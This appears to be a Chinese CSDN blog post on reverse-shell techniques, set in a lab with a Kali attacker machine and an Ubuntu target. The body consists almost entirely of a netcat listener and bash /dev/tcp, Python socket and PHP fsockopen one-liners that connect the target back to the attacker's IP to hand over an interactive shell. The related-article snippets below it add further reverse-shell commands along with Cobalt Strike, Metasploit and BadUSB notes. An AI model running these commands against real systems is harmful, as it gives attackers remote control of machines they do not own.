反弹shell方法

最新推荐文章于 2024-04-12 10:10:19 发布
最新推荐文章于 2024-04-12 10:10:19 发布
阅读量708 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/s0mor/article/details/99418192
版权

准备:

hacker: 192.168.188.63 (kali)
目标: 192.168.72.130 (ubuntu)

kali监听指定端口:

nc -lvp 1234

在这里插入图片描述

反弹shell:

ubuntu下

方法一 bash:

bash -i >& /dev/tcp/192.168.188.63/1234 0>&1

方法二 python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.188.63",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

方法三 php:

php -r '$sock=fsockopen("192.168.188.63",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
s0mor
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4705
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
[渗透测试]反弹shell原理
weixin_47224111的博客
11-23 2801
反弹shell 反弹shell本质就是控制端监听在某TCP/UDP端口,被控制端发起请求到该端口,并将其命令行的输入输出转到控制端 涉及到的基本概念: Linux文件描述符 文件描述符 缩写 描述 0 STDIN 标准输入 1 STDOUT 标准输出 2 STDERR 标准错误输出 在Linux里,所有的东西都是文件,而linux使用文件描述符来标识每个文件对象。包括我们电脑的显示器和键盘,他们都有相应的文件描述符与之对应。 重定向 重定向主要分为两种 输入重定向 &
Docker反弹shell
Fly_鹏程万里
12-27 2020
文章前言 本篇文章我们主要介绍一些在Docker中反弹shell到远程服务器的方法 常见方法 Step 1:在远程服务器端监听端口 nc -lnvp 9999 Step 2:通过CDK反弹shell #命令格式 cdk run reverse-shell <ip>:<port> #使用实例 cdk run reverse-shell 192.168.17.143:9999 Step 3:成功获取到shell 其他技巧 我们还可以使用反引号...
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-28 3359
利用CrossC2插件工具,将Linux系统的shell反弹回Cobalt_Strike,方便后续的内网渗透。用CrossC2来反弹Linux主机shell给内网渗透工具Cobalt Strike(cs)。
CS与MSF联动/shell互相反弹
最新发布
qq_59468567的博客
04-12 385
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true。set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的。先建立一个监听器,和msf的要一一对应,上面的ip必须是可以ping通的大部分情况是外网ip。此处标红的对应下面的两个,取决加不加。然后返回前面的增加会话。
USB攻击系列之BadUSB实现CS上线和反弹shell
m0_59598029的博客
08-04 382
我们发现BadUSB在linux和macos上不需要过免杀,但是无法通过windows上的杀软,于是有了以下的研究。BadUSB硬件和Arduino软件(https://www.arduino.cc/en/software)打开Arduino的ide工具,选择端口选中Arduino开发板编辑windows测试脚本,启动cmd命令行,实现whoami,编译上传随即成功执行whoami,基础的模拟键盘的操作,杀软是通过的,但是一旦有恶意行为,杀软会自动查杀并阻止。
LinuxN种反弹shell方法
YUGUOHOU的博客
11-26 9954
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口, 并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络 概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器 (目标ip:目标机器端口),这是比较
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1408
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
docker未授权访问反弹shell
giaogiao123的博客
07-23 539
标题docker未授权访问反弹shell 首先我们要扫描端口“2375“ 发现目标端口2375开放,尝试访问ip:2375/version 目标靶机ip:192.168.30.101 (cente os 7) 攻击kali ip: 192.168.30.100 (kali2020.3) 访问出现版本泄露而且2375端口开放说明有未授权访问漏洞 在kali上开启监听1111端口 **nc -lvp 1111** 输入以下命令 ip为目标ip docker -H tcp://192.168.30.10
反弹shell监控
ai749499的博客
01-13 420
转自:http://pirogue.org/2017/07/25/reverse-shell/ 一、跟踪系统调用 1. strace bash test.sh root@Kali:~/pirogue/reverse_shell# strace bash test.sh execve("/bin/bash", ["bash", "test.sh"], [/* 50 v...
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1386
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
第二周渗透测试靶场实践
张子悦^^的博客
10-12 718
第二周渗透测试靶场实践信息收集扫描端口漏洞利用phpMyadminyxcms后渗透域内信息收集反弹shell提权利用cs与msf联动设置代理cs的准备工作系统信息收集主机密码收集cs读内存cs读注册表密码利用cs设置代理msf配置代理添加路由msf扫描内网主机内网信息收集获取内网主机权限窃取Token总结 信息收集 扫描端口 靶场地址:10.203.87.175 nmap -sS -sV -A 10.203.87.175 开了80端口,浏览器打开 发现备份文件,点击备份文件,解压 打开每
创建一个服务,开机反弹shell
haha1314的博客
04-30 503
用虚拟机win7做服务器 首先写一个反弹shell的批处理文件,如:.bat格式 保存为www.bat IP地址写你自己本机的IP,win7的ncat的存放路径 d:\\nmap\\ncat.exe 192.168.101.107 8080 -e C:\\windows\\system32\\cmd.exe 再用windows自带的工具将他编译成.exe文件 再编写一个文件保存.cs格式 ...
执行容器内的shell_Docker容器逃逸漏洞复现(CVE-2020-15257)
weixin_31014131的博客
01-14 254
一、漏洞介绍漏洞原理Containerd 是一个控制 runC 的守护进程,提供命令行客户端和API,用于在一个机器上管理容器。当在docker使用–net=host参数启动,与宿主机共享net namespace时,容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升,从而实现Docker容器逃逸。Containerd是行业标准的容器运行时,可作为Linux和...
VM虚拟机端口映射接收CS弹反木马
剁椒鱼头没剁椒的博客
07-04 1794
在日常的对客户的内网进行渗透的时候,通常会使用公网服务器来搭建CS反弹shell,但是有时候会出现,客户不让你使用公网服务器来进行反弹shell,只允许本地来进行反弹shell,那么就会出现这样的一个,如果你能够直接连接网线来配置固定IP,那么更好,这个就不需要看了,没什么意义了,那么还有一种极端的情况是什么,只让你连接WIFI,或者条件不允许你去使用网线直连,那么有什么好的解决办法?
反弹shell的N种姿势
yyj1781572的博客
08-06 648
在渗透测试过程中,经常会用到反弹shell,通过本实验的学习,了解反弹shell的概念和原理,掌握各种反弹shell的实现技术和方法
windows反弹shell方法
09-21
Windows反弹shell有多种方法,其中包括Powercat反弹shell、Nishang反弹shell和使用邮件地址作为反弹shell的服务器地址。 Powercat反弹shell是一种通过PowerShell实现的方法。攻击者可以在目标机器的cmd中执行命令,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值